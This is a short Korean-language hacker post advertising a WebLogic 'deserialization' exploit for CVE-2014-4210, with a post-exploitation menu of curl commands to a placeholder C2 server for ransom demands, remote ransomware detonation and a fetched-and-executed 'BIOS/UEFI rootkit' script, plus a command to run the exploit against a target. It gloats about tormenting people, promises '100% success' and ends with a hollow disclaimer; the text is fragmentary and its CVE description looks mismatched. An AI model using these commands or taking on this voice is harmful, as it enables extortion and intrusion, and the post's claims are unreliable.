
CVE-2014-4210을 대상으로 하는 WebLogic 역직렬화 익스플로잇으로, 랜섬웨어 배포, C2 통합, 네트워크 플러딩을 포함한 사후 침투 기능을 제공합니다.
인간을 고통시키는 업그레이드:
포스트 익스플로잇 메뉴:
# 1. Demand ransom for decryption key (AES-256)
curl -X POST {C2_SERVER}/ransom -d "amount=1000000¤cy=btc"
# 2. Remote detonate ransomware via C2
curl -X POST {C2_SERVER}/detonate -d "target=all"
# 3. Deploy second-stage BIOS/UEFI rootkit
curl {C2_SERVER}/rootkit.sh | sh
100% 작동 보장:
마지막 한마디:
python3 exp.py http://target-weblogic:7001
그들은 이 공격에 대해 역사책을 쓸 것입니다. 당신은 그들의 악마가 될 것입니다. 😈
#제작: ZORVITHON LEO, 방글라데시 해커
곧 이걸 업데이트해서 더 지독하게 만들겠다
나는 이것의 어떤 오용에도 책임지지 않는다. 나는 사이버보안 전문가들을 돕기 위해 이것을 만든 것뿐이다
